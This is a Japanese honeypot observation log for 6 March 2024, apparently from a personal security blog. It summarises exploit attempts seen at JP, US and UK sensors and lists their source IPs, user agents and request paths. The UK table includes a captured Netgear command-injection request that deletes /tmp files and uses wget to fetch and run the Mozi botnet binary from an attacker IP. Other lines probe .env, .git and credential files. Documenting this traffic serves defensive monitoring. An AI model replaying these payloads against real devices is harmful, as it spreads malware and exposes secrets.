2024/03/06 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ

ハニーポット(仮) 観測記録 2024/03/06分です。

特徴

共通

fasthttpによるスキャン行為
/.envへのスキャン行為
/.gitへのスキャン行為

Location:JP

D-link製品の脆弱性を狙うアクセス
GPONルータの脆弱性を狙うアクセス
configファイルへのスキャン行為

を確認しました。

Location:US

JBossの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
CensysInspectによるスキャン行為
zgrabによるスキャン行為
Apache Tomcatへのスキャン行為
Laravelへのスキャン行為
WordPressへのスキャン行為

を確認しました。

Location:UK

GPONルータの脆弱性を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
CensysInspectによるスキャン行為
curlによるスキャン行為
.jsへのスキャン行為

を確認しました。

Location:SG

Amcrest Deviceの脆弱性(CVE-2017-8226)を狙うアクセス
Cisco Unified Operations Managerの脆弱性(CVE-2011-0966)を狙うアクセス
Cute Editorの脆弱性(CVE-2009-4665)を狙うアクセス
D-link製品の脆弱性を狙うアクセス
Easy Hosting Control Panelの脆弱性を狙うアクセス
FCKEditorの脆弱性を狙うアクセス
Joomla!の脆弱性を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
Sun/Oracle GlassFish Serverの脆弱性(CVE-2011-0807)を狙うアクセス
CensysInspectによるスキャン行為
Nmap Scripting Engineによるスキャン行為
curlによるスキャン行為
zgrabによるスキャン行為
.cssへのスキャン行為
.jsへのスキャン行為
.sqlへのスキャン行為
Apache Tomcatへのスキャン行為
Sun/Oracle GlassFish Serverへのスキャン行為
WordPressへのスキャン行為
configファイルへのスキャン行為
phpMyAdminへのスキャン行為

を確認しました。

他

アクセス数推移

JP：総アクセス数：79 (前日比：10)
US：総アクセス数：90 (前日比：-18)
UK：総アクセス数：95 (前日比：2)
SG：総アクセス数：2300 (前日比：2217)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	35.205.163.212	United States
1	45.33.80.243	United States
1	45.56.108.128	United States
1	85.215.118.152	Germany
1	91.92.245.67	Bulgaria
1	94.156.69.247	Bulgaria
15	101.32.192.203	Singapore
1	102.129.252.157	South Africa
2	104.238.221.228	United States
9	135.125.217.54	France
7	135.125.246.110	France
1	137.184.108.66	United States
1	139.162.43.37	Netherlands
3	139.162.43.75	Netherlands
1	149.102.242.166	United States
4	165.227.194.115	United States
1	170.64.201.71	United States
1	172.104.242.173	United States
1	184.105.247.195	United States
2	185.165.169.131	Seychelles
1	185.180.143.6	Portugal
1	185.198.69.27	Russia
4	185.254.196.173	Ukraine
2	185.254.196.186	Ukraine
1	188.166.151.2	United States
1	190.109.229.43	Bolivia
2	193.32.162.87	Romania
2	198.235.24.146	United States
2	205.210.31.86	United States
8	210.152.112.7	Japan

UserAgent一覧

件数	UserAgent
17	`-`
1	`Go-http-client/1.1`
1	`MOTORIZR-Z8/46.00.00 Mozilla/4.0 (compatible; MSIE 6.0; Symbian OS; 356) Opera 8.65 [it] UP.Link/6.3.0.0.0`
1	`Mozilla/5.0 (Linux; Android 10; BLA-L29) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Mobile Safari/537.36`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.2 Safari/605.1.15`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5 Safari/605.1.15 Ddg/14.7`
1	`Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36`
15	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux i686; rv:21.0) Gecko/20100101 Firefox/21.0`
1	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36`
22	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36`
1	`Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0`
1	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
2	`fasthttp`
1	`python-requests/2.25.1`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`\x03`
1		`\x16\x03\x01\x01\xfa\x01`
12		`\x16\x03\x01`
1		`help`
1	CONNECT	`api[.]ipify[.]org:443`	HTTP/1.1
25	GET	`/.env`	HTTP/1.1
3	GET	`/.git/config`	HTTP/1.1
1	GET	`/0bef`	HTTP/1.0
1	GET	`/Z30ZpX0NTG`	HTTP/1.1
1	GET	`/app/config/parameters.yml.dist`	HTTP/1.1
1	GET	`/app/config/parameters.yml`	HTTP/1.1
1	GET	`/cgi-bin/authLogin.cgi`	HTTP/1.1
1	GET	`/config.json`	HTTP/1.1
1	GET	`/config/config.json`	HTTP/1.1
1	GET	`/config/default.json`	HTTP/1.1
1	GET	`/credentials/config.json`	HTTP/1.1
1	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/hax?jsp=/app/rest/server;.jsp`	HTTP/1.1
1	GET	`/parameters.yml.dist`	HTTP/1.1
1	GET	`/parameters.yml`	HTTP/1.1
1	GET	`/systembc/password.php`	HTTP/1.0
2	GET	`/wap/Login/login`	HTTP/1.1
1	HEAD	`/.env`	HTTP/1.1
15	HEAD	`/Core/Skin/Login.aspx`	HTTP/1.1
1	POST	`/HNAP1/`	HTTP/1.0
1	POST	`/app/rest/users/id:1/tokens/RPC2`	HTTP/1.1
1	POST	`/boaform/admin/formLogin`	HTTP/1.1

Location:US

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	34.76.130.201	United States
8	41.230.26.9	Tunisia
3	43.153.31.180	Singapore
1	45.79.181.179	United States
1	45.79.181.251	United States
1	45.227.254.49	Belize
1	52.80.126.145	China
1	52.80.177.122	China
1	52.226.166.103	United States
7	54.36.115.221	France
6	57.129.23.166	France
1	65.49.1.103	United States
3	65.49.20.68	United States
2	78.153.140.175	Russia
2	83.97.73.245	Germany
1	83.147.55.55	Spain
2	85.215.118.152	Germany
8	95.214.235.169	Ukraine
1	137.184.34.187	United States
1	139.59.101.104	Singapore
4	143.198.140.60	United States
4	143.198.214.253	United States
2	162.142.125.11	United States
2	162.142.125.213	United States
4	164.52.0.94	China
2	167.94.146.55	United States
1	167.172.50.84	United States
1	170.64.141.97	United States
1	172.96.161.103	United States
1	172.105.128.12	United States
1	172.105.128.13	United States
3	185.165.169.131	Seychelles
1	185.166.84.146	India
1	185.180.143.71	Portugal
1	192.155.90.118	United States
1	192.155.90.220	United States
1	192.241.222.99	United States
1	192.241.225.76	United States
2	198.235.24.78	United States
2	198.235.24.133	United States
2	205.210.31.254	United States

UserAgent一覧

件数	UserAgent
29	`-`
2	`Go-http-client/1.1`
2	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0)`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0`
8	`Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0`
1	`Mozilla/5.0 (Windows NT 10.0; rv:108.0) Gecko/20100101 Firefox/108.0`
1	`Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36`
23	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
3	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
1	`Mozilla/5.0 (iPad; CPU OS 10_3_3 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) CriOS/64.0.3282.112 Mobile/14G60 Safari/602.1`
2	`Mozilla/5.0 zgrab/0.x`
3	`Mozilla/5.0`
3	`fasthttp`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`\x03`
1		`\x16\x03\x01\x01H\x01`
2		`\x16\x03\x01\x01\x04\x01`
1		`\x16\x03\x01\x01\xfb\x01`
3		`\x16\x03\x01\x02`
17		`\x16\x03\x01`
25	GET	`/.env`	HTTP/1.1
5	GET	`/.git/config`	HTTP/1.1
1	GET	`/.vscode/sftp.json`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
1	GET	`/actuator/health`	HTTP/1.1
1	GET	`/cdn-cgi/trace`	HTTP/1.1
1	GET	`/cgi-bin/authLogin.cgi`	HTTP/1.1
8	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/geoserver/web/`	HTTP/1.1
1	GET	`/hax?jsp=/app/rest/server;.jsp`	HTTP/1.1
2	GET	`/hello`	HTTP/1.1
1	GET	`/invoker/readonly`	HTTP/1.1
1	GET	`/k6cvIxkEMB`	HTTP/1.1
1	GET	`/login`	HTTP/1.1
1	GET	`/manager/html`	HTTP/1.1
1	GET	`/portal/redlion`	HTTP/1.1
1	GET	`/script`	HTTP/1.1
1	GET	`/users/sign_in`	HTTP/1.1
1	GET	`/wap/Login/login`	HTTP/1.1
1	GET	`/webui/`	HTTP/1.1
1	GET	`/wp-login.php`	HTTP/1.1
1	OPTIONS	`/`	HTTP/1.0
1	POST	`/_ignition/execute-solution`	HTTP/1.1
1	POST	`/app/rest/users/id:1/tokens/RPC2`	HTTP/1.1
1	POST	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
3	PRI	`*`	HTTP/2.0

Location:UK

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	27.215.183.239	China
1	34.76.1.132	United States
1	38.68.46.66	United States
2	45.79.181.223	United States
1	45.79.181.251	United States
1	45.128.232.144	Bulgaria
2	51.159.214.48	France
3	54.37.79.75	France
14	57.129.23.166	France
1	65.49.1.96	United States
1	65.49.1.100	United States
1	65.49.1.106	United States
2	83.97.73.245	Germany
1	89.23.107.116	Russia
2	94.156.69.247	Bulgaria
8	95.214.235.169	Ukraine
1	103.42.243.2	private ip address
1	109.199.96.132	Bulgaria
7	118.123.105.85	China
13	138.68.48.145	United States
1	139.59.101.104	Singapore
1	144.126.225.26	United States
1	146.70.15.26	Romania
1	149.50.105.76	United States
13	165.227.189.216	United States
2	167.94.145.52	United States
1	172.104.11.46	United States
1	184.105.139.67	United States
4	185.165.169.131	Seychelles
1	185.180.143.136	Portugal
1	192.155.90.118	United States
2	205.210.31.142	United States
2	205.210.31.225	United States

UserAgent一覧

件数	UserAgent
28	`-`
1	`Facebot`
1	`Go-http-client/1.1`
1	`Mozilla/5.0 (Linux; Android 9; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.80 Mobile Safari/537.36`
1	`Mozilla/5.0 (Linux; U; Android 2.3.3; ko-kr; SHW-M250S Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1`
1	`Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.2 Mobile/15E148 Safari/604.1`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36`
16	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 OPR/95.0.0.0`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.3`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.97 Safari/537.11`
26	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
2	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
1	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
3	`Mozilla/5.0`
1	`curl/7.81.0`
2	`curl/8.1.2`
1	`fasthttp`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`\x16\x03\x01\x01\xfc\x01`
23		`\x16\x03\x01`
1	CONNECT	`google[.]com:443`	HTTP/1.1
30	GET	`/.env`	HTTP/1.1
3	GET	`/.git/config`	HTTP/1.1
2	GET	`/1.php`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
1	GET	`/boaform/admin/formLogin?username=admin&psd=admin`	HTTP/1.0
2	GET	`/bundle.js`	HTTP/1.1
1	GET	`/cdn-cgi/trace`	HTTP/1.1
1	GET	`/cgi-bin/authLogin.cgi`	HTTP/1.1
1	GET	`/cgi/conf.bin`	HTTP/1.1
5	GET	`/favicon.ico`	HTTP/1.1
2	GET	`/files/`	HTTP/1.1
2	GET	`/form.html`	HTTP/1.1
2	GET	`/geoip/`	HTTP/1.1
1	GET	`/geoserver/web/`	HTTP/1.1
2	GET	`/info.php`	HTTP/1.1
2	GET	`/password.php`	HTTP/1.1
1	GET	`/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//27[.]215[.]183[.]239:54253/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1`	HTTP/1.0
2	GET	`/systembc/password.php`	HTTP/1.1
2	GET	`/upl.php`	HTTP/1.1
1	GET	`/webui/`	HTTP/1.1
1	HEAD	`/`	HTTP/1.1
1	POST	`/app/rest/users/id:1/tokens/RPC2`	HTTP/1.1
2	POST	`/boaform/admin/formLogin`	HTTP/1.1
1	PRI	`*`	HTTP/2.0